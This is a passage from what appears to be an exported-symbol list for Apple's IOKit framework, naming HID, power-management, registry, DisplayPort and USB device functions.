_IOAVVideoTimingGetActivePixelClock, _IOAVVideoTimingGetPixelClock, - _IOAVVideoTimingGetSyncRateRounded, _IOAVVideoTimingTypeString, - _IOAllowPowerChange, _IOBSDNameMatching, _IOCFSerialize, - _IOCFURLWriteDataAndPropertiesToResource, _IOCFUnserialize, - _IOCFUnserializeBinary, _IOCFUnserializeWithSize, - _IOCFUnserializeparse, _IOCancelPowerChange, _IOCatalogueGetData, - _IOCatalogueModuleLoaded, _IOCatalogueReset, _IOCatalogueSendData, - _IOCatalogueTerminate, _IOCatlogueGetGenCount, _IOCloseConnection, - _IOCompatibiltyNumber, _IOConnectAddClient, _IOConnectAddRef, - _IOConnectCallAsyncMethod, _IOConnectCallAsyncScalarMethod, - _IOConnectCallAsyncStructMethod, _IOConnectCallMethod, - _IOConnectCallScalarMethod, _IOConnectCallStructMethod, - _IOConnectGetService, _IOConnectMapMemory, _IOConnectMapMemory64, - _IOConnectRelease, _IOConnectSetCFProperties, _IOConnectSetCFProperty, - _IOConnectSetNotificationPort, _IOConnectTrap0, - _IOConnectTrap1, _IOConnectTrap2, _IOConnectTrap3, - _IOConnectTrap4, _IOConnectTrap5, _IOConnectTrap6, - _IOConnectUnmapMemory, _IOConnectUnmapMemory64, - _IOCopySystemLoadAdvisoryDetailed, _IOCreatePlugInInterfaceForService, - _IOCreateReceivePort, _IODPCalculateM, _IODPCommandString, - _IODPCompareLinkTrainingData, _IODPControllerCreate, - _IODPControllerCreateWithLocation, _IODPControllerCreateWithService, - _IODPControllerGetAVController, _IODPControllerGetMaxLaneCount, - _IODPControllerGetMaxLinkRate, _IODPControllerGetMinLaneCount, - _IODPControllerGetMinLinkRate, _IODPControllerGetTypeID, - _IODPControllerSetDownspreadModulationFrequency, - _IODPControllerSetDriveSettings, _IODPControllerSetLaneCount, - _IODPControllerSetLinkRate, _IODPControllerSetMaxLaneCount, - _IODPControllerSetMaxLinkRate, _IODPControllerSetMinLaneCount, - _IODPControllerSetMinLinkRate, _IODPControllerSetSupportsALPM, - _IODPControllerSetSupportsDownspread, _IODPControllerSetSupportsEnhancedMode, - _IODPControllerSetSupportsScrambling, _IODPCreateStringWithLinkTrainingData, - _IODPDeviceCreate, _IODPDeviceCreateWithLocation, - _IODPDeviceCreateWithService, _IODPDeviceGetAVDevice, - _IODPDeviceGetController, _IODPDeviceGetLinkTrainingData, - _IODPDeviceGetMaxLaneCount, _IODPDeviceGetMaxLinkRate, - _IODPDeviceGetRevisionMajor, _IODPDeviceGetRevisionMinor, - _IODPDeviceGetSinkCount, _IODPDeviceGetSupportsDownspread, - _IODPDeviceGetSupportsEnhancedMode, _IODPDeviceGetSymbolErrorCount, - _IODPDeviceGetTypeID, _IODPDeviceReadDPCD, _IODPDeviceSetALPMEnabled, - _IODPDeviceTypeString, _IODPDeviceWriteDPCD, _IODPDriveSettingsAreValid, - _IODPEventLogEventTypeString, _IODPLinkMaxPixelRate, - _IODPLinkRateEnum, _IODPLinkRateIsStandard, _IODPLinkRateScalar, - _IODPLinkSymbolRate, _IODPServiceCreate, _IODPServiceCreateWithLocation, - _IODPServiceCreateWithService, _IODPServiceGetAVService, - _IODPServiceGetDevice, _IODPServiceGetSinkCount, - _IODPServiceGetSymbolErrorCount, _IODPServiceGetTypeID, - _IODPServiceRetrainLink, _IODPServiceSetLinkCheckEnable, - _IODPStreamClockHz, _IODPTrainingPatternLength, - _IODPVideoMinLinkRate, _IODataQueueAllocateNotificationPort, - _IODataQueueDataAvailable, _IODataQueueDequeue, - _IODataQueueEnqueue, _IODataQueuePeek, _IODataQueueSetNotificationPort, - _IODataQueueWaitForAvailableData, _IODeregisterApp, - _IODeregisterForSystemPower, _IODestroyPlugInInterface, - _IODispatchCalloutFromCFMessage, _IODispatchCalloutFromMessage, - _IOEthernetControllerCreate, _IOEthernetControllerGetBSDSocket, - _IOEthernetControllerGetIONetworkInterfaceObject, - _IOEthernetControllerGetTypeID, _IOEthernetControllerReadPacket, - _IOEthernetControllerRegisterBSDAttachCallback, - _IOEthernetControllerRegisterDisableCallback, _IOEthernetControllerRegisterEnableCallback, - _IOEthernetControllerRegisterPacketAvailableCallback, - _IOEthernetControllerScheduleWithRunLoop, _IOEthernetControllerSetDispatchQueue, - _IOEthernetControllerSetLinkStatus, _IOEthernetControllerSetPowerSavings, - _IOEthernetControllerUnscheduleFromRunLoop, _IOEthernetControllerWritePacket, - _IOGetSystemLoadAdvisory, _IOHIDCopyCFTypeParameter, - _IOHIDCreateSharedMemory, _IOHIDDeviceClose, _IOHIDDeviceConformsTo, - _IOHIDDeviceCopyMatchingElements, _IOHIDDeviceCopyValueMultiple, - _IOHIDDeviceCopyValueMultipleWithCallback, _IOHIDDeviceCreate, - _IOHIDDeviceGetProperty, _IOHIDDeviceGetReport, - _IOHIDDeviceGetReportWithCallback, _IOHIDDeviceGetService, - _IOHIDDeviceGetTypeID, _IOHIDDeviceGetValue, _IOHIDDeviceGetValueWithCallback, - _IOHIDDeviceOpen, _IOHIDDeviceRegisterInputReportCallback, - _IOHIDDeviceRegisterInputReportWithTimeStampCallback, - _IOHIDDeviceRegisterInputValueCallback, _IOHIDDeviceRegisterRemovalCallback, - _IOHIDDeviceScheduleWithRunLoop, _IOHIDDeviceSetInputValueMatching, - _IOHIDDeviceSetInputValueMatchingMultiple, _IOHIDDeviceSetProperty, - _IOHIDDeviceSetReport, _IOHIDDeviceSetReportWithCallback, - _IOHIDDeviceSetValue, _IOHIDDeviceSetValueMultiple, - _IOHIDDeviceSetValueMultipleWithCallback, _IOHIDDeviceSetValueWithCallback, - _IOHIDDeviceUnscheduleFromRunLoop, _IOHIDElementAttach, - _IOHIDElementCopyAttached, _IOHIDElementCreateWithDictionary, - _IOHIDElementDetach, _IOHIDElementGetChildren, _IOHIDElementGetCollectionType, - _IOHIDElementGetCookie, _IOHIDElementGetDevice, - _IOHIDElementGetDuplicateIndex, _IOHIDElementGetLogicalMax, - _IOHIDElementGetLogicalMin, _IOHIDElementGetName, - _IOHIDElementGetParent, _IOHIDElementGetPhysicalMax, - _IOHIDElementGetPhysicalMin, _IOHIDElementGetProperty, - _IOHIDElementGetReportCount, _IOHIDElementGetReportID, - _IOHIDElementGetReportSize, _IOHIDElementGetType, - _IOHIDElementGetTypeID, _IOHIDElementGetUnit, _IOHIDElementGetUnitExponent, - _IOHIDElementGetUsage, _IOHIDElementGetUsagePage, - _IOHIDElementHasNullState, _IOHIDElementHasPreferredState, - _IOHIDElementIsArray, _IOHIDElementIsNonLinear, - _IOHIDElementIsRelative, _IOHIDElementIsVirtual, - _IOHIDElementIsWrapping, _IOHIDElementSetProperty, - _IOHIDEventAppendEvent, _IOHIDEventConformsTo, _IOHIDEventConformsToWithOptions, - _IOHIDEventCreate, _IOHIDEventCreateAccelerometerEvent, - _IOHIDEventCreateAccelerometerEventWithType, _IOHIDEventCreateAmbientLightSensorEvent, - _IOHIDEventCreateAtmosphericPressureEvent, _IOHIDEventCreateBiometricEvent, - _IOHIDEventCreateBoundaryScrollEvent, _IOHIDEventCreateButtonEvent, - _IOHIDEventCreateButtonEventWithPressure, _IOHIDEventCreateCompassEvent, - _IOHIDEventCreateCompassEventWithType, _IOHIDEventCreateCopy, - _IOHIDEventCreateData, _IOHIDEventCreateDigitizerEvent, - _IOHIDEventCreateDigitizerFingerEvent, _IOHIDEventCreateDigitizerFingerEventWithQuality, - _IOHIDEventCreateDigitizerStylusEvent, _IOHIDEventCreateDigitizerStylusEventWithPolarOrientation, - _IOHIDEventCreateDockSwipeEvent, _IOHIDEventCreateFluidTouchGestureEvent, - _IOHIDEventCreateForceEvent, _IOHIDEventCreateGyroEvent, - _IOHIDEventCreateGyroEventWithType, _IOHIDEventCreateKeyboardEvent, - _IOHIDEventCreateLEDEvent, _IOHIDEventCreateMotionActivtyEvent, - _IOHIDEventCreateMotionGestureEvent, _IOHIDEventCreateMouseEvent, - _IOHIDEventCreateNavigationSwipeEvent, _IOHIDEventCreateOrientationEvent, - _IOHIDEventCreatePolarOrientationEvent, _IOHIDEventCreateProgressEvent, - _IOHIDEventCreateProximtyEvent, _IOHIDEventCreateRelativePointerEvent, - _IOHIDEventCreateRotationEvent, _IOHIDEventCreateScaleEvent, - _IOHIDEventCreateScrollEvent, _IOHIDEventCreateSwipeEvent, - _IOHIDEventCreateSymbolicHotKeyEvent, _IOHIDEventCreateTranslationEvent, - _IOHIDEventCreateUnicodeEvent, _IOHIDEventCreateUnicodeEventWithQuality, - _IOHIDEventCreateVelocityEvent, _IOHIDEventCreateVendorDefinedEvent, - _IOHIDEventCreateWithBytes, _IOHIDEventCreateWithData, - _IOHIDEventCreateZoomToggleEvent, _IOHIDEventGetAttributeData, - _IOHIDEventGetAttributeDataLength, _IOHIDEventGetAttributeDataPtr, - _IOHIDEventGetChildren, _IOHIDEventGetDataLength, - _IOHIDEventGetDataValue, _IOHIDEventGetDataValueWithOptions, - _IOHIDEventGetEvent, _IOHIDEventGetEventFlags, _IOHIDEventGetEventWithOptions, - _IOHIDEventGetFloatMultiple, _IOHIDEventGetFloatMultipleWithOptions, - _IOHIDEventGetFloatValue, _IOHIDEventGetFloatValueWithOptions, - _IOHIDEventGetIntegerMultiple, _IOHIDEventGetIntegerMultipleWithOptions, - _IOHIDEventGetIntegerValue, _IOHIDEventGetIntegerValueWithOptions, - _IOHIDEventGetLatency, _IOHIDEventGetParent, _IOHIDEventGetPhase, - _IOHIDEventGetPosition, _IOHIDEventGetPositionWithOptions, - _IOHIDEventGetSenderID, _IOHIDEventGetTimeStamp, - _IOHIDEventGetType, _IOHIDEventGetTypeID, _IOHIDEventGetTypeString, - _IOHIDEventGetVendorDefinedData, _IOHIDEventIsAbsolute, - _IOHIDEventIsRepeat, _IOHIDEventQueueCreate, _IOHIDEventQueueCreateWithVM, - _IOHIDEventQueueDequeueCopy, _IOHIDEventQueueEnqueue, - _IOHIDEventQueueGetMemoryHandle, _IOHIDEventQueueGetNotificationPort, - _IOHIDEventQueueGetTypeID, _IOHIDEventQueueIsActive, - _IOHIDEventQueueSetNotificationPort, _IOHIDEventQueueStart, - _IOHIDEventQueueStop, _IOHIDEventReadBytes, _IOHIDEventRemoveEvent, - _IOHIDEventServerCreate, _IOHIDEventServerGetTypeID, - _IOHIDEventServerScheduleWithDispatchQueue, _IOHIDEventServerUnscheduleFromDispatchQueue, - _IOHIDEventSetAttributeData, _IOHIDEventSetEventFlags, - _IOHIDEventSetFloatMultiple, _IOHIDEventSetFloatMultipleWithOptions, - _IOHIDEventSetFloatValue, _IOHIDEventSetFloatValueWithOptions, - _IOHIDEventSetIntegerMultiple, _IOHIDEventSetIntegerMultipleWithOptions, - _IOHIDEventSetIntegerValue, _IOHIDEventSetIntegerValueWithOptions, - _IOHIDEventSetPhase, _IOHIDEventSetPosition, _IOHIDEventSetPositionWithOptions, - _IOHIDEventSetRepeat, _IOHIDEventSetSenderID, _IOHIDEventSetTimeStamp, - _IOHIDEventSystemClient, _IOHIDEventSystemClientCopyProperty, - _IOHIDEventSystemClientCopyServiceForRegistryID, - _IOHIDEventSystemClientCopyServices, _IOHIDEventSystemClientCreate, - _IOHIDEventSystemClientCreateWithType, _IOHIDEventSystemClientDispatchEvent, - _IOHIDEventSystemClientGetTypeID, _IOHIDEventSystemClientGetTypeString, - _IOHIDEventSystemClientRegisterDeviceMatchingBlock, - _IOHIDEventSystemClientRegisterDeviceMatchingCallback, - _IOHIDEventSystemClientRegisterEventBlock, _IOHIDEventSystemClientRegisterEventCallback, - _IOHIDEventSystemClientRegisterEventFilterBlock, - _IOHIDEventSystemClientRegisterEventFilterBlockWithPriority, - _IOHIDEventSystemClientRegisterEventFilterCallback, - _IOHIDEventSystemClientRegisterEventFilterCallbackWithPriority, - _IOHIDEventSystemClientRegisterPropertyChangedCallback, - _IOHIDEventSystemClientRegisterResetCallback, _IOHIDEventSystemClientRegistryIDConformsTo, - _IOHIDEventSystemClientScheduleWithDispatchQueue, - _IOHIDEventSystemClientScheduleWithRunLoop, _IOHIDEventSystemClientSetMatching, - _IOHIDEventSystemClientSetMatchingMultiple, _IOHIDEventSystemClientSetProperty, - _IOHIDEventSystemClientUnregisterDeviceMatchingBlock, - _IOHIDEventSystemClientUnregisterDeviceMatchingCallback, - _IOHIDEventSystemClientUnregisterEventBlock, _IOHIDEventSystemClientUnregisterEventCallback, - _IOHIDEventSystemClientUnregisterEventFilterBlock, - _IOHIDEventSystemClientUnregisterEventFilterCallback, - _IOHIDEventSystemClientUnregisterPropertyChangedCallback, - _IOHIDEventSystemClientUnregisterResetCallback, - _IOHIDEventSystemClientUnscheduleFromDispatchQueue, - _IOHIDEventSystemClientUnscheduleWithRunLoop, _IOHIDEventSystemClose, - _IOHIDEventSystemConnectionDispatchEvent, _IOHIDEventSystemConnectionGetAttribute, - _IOHIDEventSystemConnectionGetTask, _IOHIDEventSystemConnectionGetType, - _IOHIDEventSystemConnectionGetTypeID, _IOHIDEventSystemConnectionGetTypeString, - _IOHIDEventSystemCopyConnections, _IOHIDEventSystemCopyEvent, - _IOHIDEventSystemCopyMatchingServices, _IOHIDEventSystemCopyService, - _IOHIDEventSystemCopyServices, _IOHIDEventSystemCreate, - _IOHIDEventSystemGetProperty, _IOHIDEventSystemGetTypeID, - _IOHIDEventSystemOpen, _IOHIDEventSystemRegisterConnectionAdditionCallback, - _IOHIDEventSystemRegisterConnectionRemovalCallback, - _IOHIDEventSystemRegisterServicesCallback, _IOHIDEventSystemSetCallback, - _IOHIDEventSystemSetProperty, _IOHIDEventSystemUnregisterConnectionAdditionCallback, - _IOHIDEventSystemUnregisterConnectionRemovalCallback, - _IOHIDEventSystemUnregisterServicesCallback, _IOHIDEventTypeGetName, - _IOHIDGetAccelerationWithKey, _IOHIDGetActivityState, - _IOHIDGetButtonEventNum, _IOHIDGetModifierLockState, - _IOHIDGetMouseAcceleration, _IOHIDGetMouseButtonMode, - _IOHIDGetParameter, _IOHIDGetScrollAcceleration, - _IOHIDGetStateForSelector, _IOHIDManagerClose, _IOHIDManagerCopyDevices, - _IOHIDManagerCreate, _IOHIDManagerGetProperty, _IOHIDManagerGetTypeID, - _IOHIDManagerOpen, _IOHIDManagerRegisterDeviceMatchingCallback, - _IOHIDManagerRegisterDeviceRemovalCallback, _IOHIDManagerRegisterInputReportCallback, - _IOHIDManagerRegisterInputValueCallback, _IOHIDManagerSaveToPropertyDomain, - _IOHIDManagerScheduleWithRunLoop, _IOHIDManagerSetDeviceMatching, - _IOHIDManagerSetDeviceMatchingMultiple, _IOHIDManagerSetInputValueMatching, - _IOHIDManagerSetInputValueMatchingMultiple, _IOHIDManagerSetProperty, - _IOHIDManagerUnscheduleFromRunLoop, _IOHIDNotificationCreate, - _IOHIDNotificationGetClientCallback, _IOHIDNotificationGetClientRefcon, - _IOHIDNotificationGetClientTarget, _IOHIDNotificationGetOwnerCallback, - _IOHIDNotificationGetOwnerRefcon, _IOHIDNotificationGetOwnerTarget, - _IOHIDNotificationGetTypeID, _IOHIDPostEvent, _IOHIDQueueAddElement, - _IOHIDQueueContainsElement, _IOHIDQueueCopyNextValue, - _IOHIDQueueCopyNextValueWithTimeout, _IOHIDQueueCreate, - _IOHIDQueueGetDepth, _IOHIDQueueGetDevice, _IOHIDQueueGetTypeID, - _IOHIDQueueRegisterValueAvailableCallback, _IOHIDQueueRemoveElement, - _IOHIDQueueScheduleWithRunLoop, _IOHIDQueueSetDepth, - _IOHIDQueueStart, _IOHIDQueueStop, _IOHIDQueueUnscheduleFromRunLoop, - _IOHIDRegisterVirtualDisplay, _IOHIDServiceClientConformsTo, - _IOHIDServiceClientCopyEvent, _IOHIDServiceClientCopyProperty, - _IOHIDServiceClientGetRegistryID, _IOHIDServiceClientGetTypeID, - _IOHIDServiceClientRegisterRemovalBlock, _IOHIDServiceClientRegisterRemovalCallback, - _IOHIDServiceClientSetElementValue, _IOHIDServiceClientSetProperty, - _IOHIDServiceConformsTo, _IOHIDServiceConnectionCacheContainsKey, - _IOHIDServiceConnectionCacheCopyValueForKey, _IOHIDServiceConnectionCacheCreate, - _IOHIDServiceConnectionCacheGetReportDeadline, _IOHIDServiceConnectionCacheGetTypeID, - _IOHIDServiceConnectionCacheGetUnresponsiveness, - _IOHIDServiceConnectionCacheSetReportDeadline, _IOHIDServiceConnectionCacheSetUnresponsiveness, - _IOHIDServiceConnectionCacheSetValueForKey, _IOHIDServiceCopyEvent, - _IOHIDServiceCopyProperty, _IOHIDServiceCreatePropertyChangedNotification, - _IOHIDServiceCreateRemovalNotification, _IOHIDServiceFilterClose, - _IOHIDServiceFilterCopyPropertyForClient, _IOHIDServiceFilterCreate, - _IOHIDServiceFilterFilterCopyEvent, _IOHIDServiceFilterFilterEvent, - _IOHIDServiceFilterGetType, _IOHIDServiceFilterGetTypeID, - _IOHIDServiceFilterMatch, _IOHIDServiceFilterOpen, - _IOHIDServiceFilterSchedule, _IOHIDServiceFilterSetEventCallback, - _IOHIDServiceFilterSetOutputEvent, _IOHIDServiceFilterSetPropertyForClient, - _IOHIDServiceFilterUnschedule, _IOHIDServiceGetProperty, - _IOHIDServiceGetRegistryID, _IOHIDServiceGetTypeID, - _IOHIDServiceMatchPropertyTable, _IOHIDServiceSetElementValue, - _IOHIDServiceSetOutputEvent, _IOHIDServiceSetProperty, - _IOHIDSessionAddService, _IOHIDSessionClose, _IOHIDSessionCopyEvent, - _IOHIDSessionCreate, _IOHIDSessionFilterClose, _IOHIDSessionFilterCopyEvent, - _IOHIDSessionFilterCreate, _IOHIDSessionFilterFilterCopyEvent, - _IOHIDSessionFilterFilterEvent, _IOHIDSessionFilterGetPropertyForClient, - _IOHIDSessionFilterGetType, _IOHIDSessionFilterGetTypeID, - _IOHIDSessionFilterOpen, _IOHIDSessionFilterRegisterService, - _IOHIDSessionFilterScheduleWithDispatchQueue, _IOHIDSessionFilterSetPropertyForClient, - _IOHIDSessionFilterUnregisterService, _IOHIDSessionFilterUnscheduleFromDispatchQueue, - _IOHIDSessionGetProperty, _IOHIDSessionGetTypeID, - _IOHIDSessionOpen, _IOHIDSessionRemoveService, _IOHIDSessionSetProperty, - _IOHIDSetAccelerationWithKey, _IOHIDSetCFTypeParameter, - _IOHIDSetCursorBounds, _IOHIDSetCursorEnable, _IOHIDSetEventsEnable, - _IOHIDSetFixedMouseLocation, _IOHIDSetModifierLockState, - _IOHIDSetMouseAcceleration, _IOHIDSetMouseButtonMode, - _IOHIDSetMouseLocation, _IOHIDSetOnScreenCursorBounds, - _IOHIDSetParameter, _IOHIDSetScrollAcceleration, - _IOHIDSetStateForSelector, _IOHIDSetVirtualDisplayBounds, - _IOHIDTransactionAddElement, _IOHIDTransactionClear, - _IOHIDTransactionCommit, _IOHIDTransactionCommitWithCallback, - _IOHIDTransactionContainsElement, _IOHIDTransactionCreate, - _IOHIDTransactionGetDevice, _IOHIDTransactionGetDirection, - _IOHIDTransactionGetTypeID, _IOHIDTransactionGetValue, - _IOHIDTransactionRemoveElement, _IOHIDTransactionScheduleWithRunLoop, - _IOHIDTransactionSetDirection, _IOHIDTransactionSetValue, - _IOHIDTransactionUnscheduleFromRunLoop, _IOHIDUnregisterVirtualDisplay, - _IOHIDUserDeviceCreate, _IOHIDUserDeviceCreateWithOptions, - _IOHIDUserDeviceGetTypeID, _IOHIDUserDeviceHandleReport, - _IOHIDUserDeviceHandleReportAsync, _IOHIDUserDeviceHandleReportAsyncWithTimeStamp, - _IOHIDUserDeviceHandleReportWithTimeStamp, _IOHIDUserDeviceRegisterGetReportCallback, - _IOHIDUserDeviceRegisterGetReportWithReturnLengthCallback, - _IOHIDUserDeviceRegisterSetReportCallback, _IOHIDUserDeviceScheduleWithDispatchQueue, - _IOHIDUserDeviceScheduleWithRunLoop, _IOHIDUserDeviceUnscheduleFromDispatchQueue, - _IOHIDUserDeviceUnscheduleFromRunLoop, _IOHIDValueCreateWithBytes, - _IOHIDValueCreateWithBytesNoCopy, _IOHIDValueCreateWithIntegerValue, - _IOHIDValueGetBytePtr, _IOHIDValueGetElement, _IOHIDValueGetIntegerValue, - _IOHIDValueGetLength, _IOHIDValueGetScaledValue, - _IOHIDValueGetTimeStamp, _IOHIDValueGetTypeID, _IOInitContainerClasses, - _IOIteratorIsValid, _IOIteratorNext, _IOIteratorReset, - _IOKitGetBusyState, _IOKitWaitQuiet, _IOMIGMachPortCacheAdd, - _IOMIGMachPortCacheCopy, _IOMIGMachPortCacheRemove, - _IOMIGMachPortCreate, _IOMIGMachPortGetPort, _IOMIGMachPortGetTypeID, - _IOMIGMachPortRegisterDemuxCallback, _IOMIGMachPortRegisterTerminationCallback, - _IOMIGMachPortScheduleWithDispatchQueue, _IOMIGMachPortScheduleWithRunLoop, - _IOMIGMachPortUnscheduleFromDispatchQueue, _IOMIGMachPortUnscheduleFromRunLoop, - _IOMasterPort, _IONetworkClose, _IONetworkGetDataCapacity, - _IONetworkGetDataHandle, _IONetworkGetPacketFiltersMask, - _IONetworkOpen, _IONetworkReadData, _IONetworkResetData, - _IONetworkSetPacketFiltersMask, _IONetworkWriteData, - _IONotificationPortCreate, _IONotificationPortDestroy, - _IONotificationPortGetMachPort, _IONotificationPortGetRunLoopSource, - _IONotificationPortSetDispatchQueue, _IOObjectConformsTo, - _IOObjectCopyBundleIdentifierForClass, _IOObjectCopyClass, - _IOObjectCopySuperclassForClass, _IOObjectGetClass, - _IOObjectGetKernelRetainCount, _IOObjectGetRetainCount, - _IOObjectGetUserRetainCount, _IOObjectIsEqualTo, - _IOObjectRelease, _IOObjectRetain, _IOOpenConnection, - _IOOpenFirmwarePathMatching, _IOPMActivateSystemPowerSettings, - _IOPMAllowsBackgroundTask, _IOPMAllowsPushServiceTask, - _IOPMAssertionCopyProperties, _IOPMAssertionCreate, - _IOPMAssertionCreateWithDescription, _IOPMAssertionCreateWithName, - _IOPMAssertionCreateWithProperties, _IOPMAssertionDeclareNotificationEvent, - _IOPMAssertionDeclareSystemActivity, _IOPMAssertionDeclareUserActivity, - _IOPMAssertionNotify, _IOPMAssertionRelease, _IOPMAssertionRetain, - _IOPMAssertionSetBTCollection, _IOPMAssertionSetProperty, - _IOPMAssertionSetTimeout, _IOPMCancelAllRepeatingPowerEvents, - _IOPMCancelAllScheduledPowerEvents, _IOPMCancelScheduledPowerEvent, - _IOPMChangeSystemActivityAssertionBehavior, _IOPMClaimSystemWakeEvent, - _IOPMConnectionAcknowledgeEvent, _IOPMConnectionAcknowledgeEventWithOptions, - _IOPMConnectionCreate, _IOPMConnectionGetSystemCapabilities, - _IOPMConnectionRelease, _IOPMConnectionScheduleWithRunLoop, - _IOPMConnectionSetDispatchQueue, _IOPMConnectionSetNotification, - _IOPMConnectionUnscheduleFromRunLoop, _IOPMCopyActivePMPreferences, - _IOPMCopyActivePowerProfiles, _IOPMCopyAssertionActivityAggregate, - _IOPMCopyAssertionActivityAggregateWithAllocator, - _IOPMCopyAssertionActivityLog, _IOPMCopyAssertionActivityLogWithAllocator, - _IOPMCopyAssertionActivityUpdate, _IOPMCopyAssertionActivityUpdateWithAllocator, - _IOPMCopyAssertionsByProcess, _IOPMCopyAssertionsByProcessWithAllocator, - _IOPMCopyAssertionsByType, _IOPMCopyAssertionsStatus, - _IOPMCopyBatteryInfo, _IOPMCopyCPUPowerStatus, _IOPMCopyConnectionStatus, - _IOPMCopyCustomPMPreferences, _IOPMCopyHIDPostEventHistory, - _IOPMCopyPMPreferences, _IOPMCopyPowerHistory, _IOPMCopyPowerHistoryDetailed, - _IOPMCopyPowerProfiles, _IOPMCopyPowerStateInfo, - _IOPMCopyRepeatingPowerEvents, _IOPMCopyScheduledPowerEvents, - _IOPMCopySleepPreventersList, _IOPMCopySleepWakeFailure, - _IOPMCopySystemPowerSettings, _IOPMCopyUPSShutdownLevels, - _IOPMCopyUnabridgedActivePMPreferences, _IOPMCopyUserActivityLevelDescription, - _IOPMCtlAssertionType, _IOPMDebugTracePoint, _IOPMDeclareNetworkClientActivity, - _IOPMFeatureIsAvailable, _IOPMFeatureIsAvailableWithSupportedTable, - _IOPMFindPowerManagement, _IOPMGetActivePushConnectionState, - _IOPMGetAggressiveness, _IOPMGetCapabilitiesDescription, - _IOPMGetDarkWakeThermalEmergencyCount, _IOPMGetLastWakeTime, - _IOPMGetPerformanceWarningLevel, _IOPMGetSleepServicesActive, - _IOPMGetThermalWarningLevel, _IOPMGetUUID, _IOPMGetUserActivityLevel, - _IOPMGetValueInt, _IOPMIsADarkWake, _IOPMIsASilentWake, - _IOPMIsASleep, _IOPMIsAUserWake, _IOPMOverrideDefaultPMPreferences, - _IOPMPerformBlockWithAssertion, _IOPMPrefsNotificationCreateRunLoopSource, - _IOPMRequestSysWake, _IOPMRevertPMPreferences, _IOPMSchedulePowerEvent, - _IOPMScheduleRepeatingPowerEvent, _IOPMScheduleUserActiveChangedNotification, - _IOPMScheduleUserActivityLevelNotification, _IOPMSetActivePowerProfiles, - _IOPMSetActivePushConnectionState, _IOPMSetAggressiveness, - _IOPMSetAssertionActivityAggregate, _IOPMSetAssertionActivityLog, - _IOPMSetBTWakeInterval, _IOPMSetCustomPMPreferences, - _IOPMSetDWLingerInterval, _IOPMSetDebugFlags, _IOPMSetPMPreferences, - _IOPMSetReservePowerMode, _IOPMSetSleepServicesWakeTimeCap, - _IOPMSetSystemPowerSetting, _IOPMSetUPSShutdownLevels, - _IOPMSetValueInt, _IOPMSleepEnabled, _IOPMSleepSystem, - _IOPMSleepSystemWithOptions, _IOPMSleepWakeCopyUUID, - _IOPMSleepWakeSetUUID, _IOPMUnregisterNotification, - _IOPMUserDidChangeCallback, _IOPMUserIsActive, _IOPSAccCreateAttachNotification, - _IOPSAccCreateLimitedPowerNotification, _IOPSAccNotificationCreateRunLoopSource, - _IOPSCopyChargeLog, _IOPSCopyExternalPowerAdapterDetails, - _IOPSCopyInternalBatteriesArray, _IOPSCopyPowerSourcesByType, - _IOPSCopyPowerSourcesInfo, _IOPSCopyPowerSourcesList, - _IOPSCopyUPSArray, _IOPSCreateLimitedPowerNotification, - _IOPSCreatePowerSource, _IOPSDrawingUnlimitedPower, - _IOPSGetActiveBattery, _IOPSGetActiveUPS, _IOPSGetBatteryWarningLevel, - _IOPSGetPercentRemaining, _IOPSGetPowerSourceDescription, - _IOPSGetProvidingPowerSourceType, _IOPSGetSupportedPowerSources, - _IOPSGetTimeRemainingEstimate, _IOPSNotificationCreateRunLoopSource, - _IOPSPowerSourceSupported, _IOPSReleasePowerSource, - _IOPSRequestBatteryUpdate, _IOPSSetPowerSourceDetails, - _IORegisterApp, _IORegisterClient, _IORegisterForSystemPower, - _IORegistryCreateEnumerator, _IORegistryCreateIterator, - _IORegistryDisposeEnumerator, _IORegistryEntryCopyFromPath, - _IORegistryEntryCopyPath, _IORegistryEntryCreateCFProperties, - _IORegistryEntryCreateCFProperty, _IORegistryEntryCreateIterator, - _IORegistryEntryFromPath, _IORegistryEntryGetChildEntry, - _IORegistryEntryGetChildIterator, _IORegistryEntryGetLocationInPlane, - _IORegistryEntryGetName, _IORegistryEntryGetNameInPlane, - _IORegistryEntryGetParentEntry, _IORegistryEntryGetParentIterator, - _IORegistryEntryGetPath, _IORegistryEntryGetProperty, - _IORegistryEntryGetRegistryEntryID, _IORegistryEntryIDMatching, - _IORegistryEntryInPlane, _IORegistryEntrySearchCFProperty, - _IORegistryEntrySetCFProperties, _IORegistryEntrySetCFProperty, - _IORegistryEnumeratorNextConforming, _IORegistryEnumeratorReset, - _IORegistryGetRootEntry, _IORegistryIteratorEnterEntry, - _IORegistryIteratorExitEntry, _IOServiceAddInterestNotification, - _IOServiceAddMatchingNotification, _IOServiceAddNotification, - _IOServiceAuthorize, _IOServiceClose, _IOServiceGetBusyState, - _IOServiceGetBusyStateAndTime, _IOServiceGetMatchingService, - _IOServiceGetMatchingServices, _IOServiceGetState, - _IOServiceMatchPropertyTable, _IOServiceMatching, - _IOServiceNameMatching, _IOServiceOFPathToBSDName, - _IOServiceOpen, _IOServiceOpenAsFileDescriptor, - _IOServiceRequestProbe, _IOServiceWaitQuiet, _IOSetNotificationPort, - _IOURLCreateDataAndPropertiesFromResource, _IOURLCreatePropertyFromResource, - _IOUSBDevicDeviceDescriptionGetTypeID, _IOUSBDeviceControllerCreate, - _IOUSBDeviceControllerCreateDefaultDescription, - _IOUSBDeviceControllerCreateWithService, _IOUSBDeviceControllerForceOffBus, - _IOUSBDeviceControllerGetService, _IOUSBDeviceControllerGetTypeID, - _IOUSBDeviceControllerGoOffAndOnBus, _IOUSBDeviceControllerRegisterArrivalCallback, - _IOUSBDeviceControllerRemoveArrivalCallback, _IOUSBDeviceControllerSendCommand, - _IOUSBDeviceControllerSetDescription, _IOUSBDeviceControllerSetPreferredConfiguration, - _IOUSBDeviceDataCreate, _IOUSBDeviceDataGetBytePtr, - _IOUSBDeviceDataGetCapacity, _IOUSBDeviceDataGetMapToken, - _IOUSBDeviceDataGetTypeID, _IOUSBDeviceDescriptionAppendConfiguration, - _IOUSBDeviceDescriptionAppendConfigurationWithInterface, - _IOUSBDeviceDescriptionAppendConfigurationWithInterfaces, - _IOUSBDeviceDescriptionAppendConfigurationWithoutAttributes, - _IOUSBDeviceDescriptionAppendInterfaceToConfiguration, - _IOUSBDeviceDescriptionAppendInterfacesToConfiguration, - _IOUSBDeviceDescriptionCopyInterfaces, _IOUSBDeviceDescriptionCreate, - _IOUSBDeviceDescriptionCreateFromController, _IOUSBDeviceDescriptionCreateFromControllerWithType, - _IOUSBDeviceDescriptionCreateFromDefaults, _IOUSBDeviceDescriptionCreateFromDefaultsAndController, - _IOUSBDeviceDescriptionCreateWithConfigurationInterfaces, - _IOUSBDeviceDescriptionCreateWithType, _IOUSBDeviceDescriptionGetAllowOverride, - 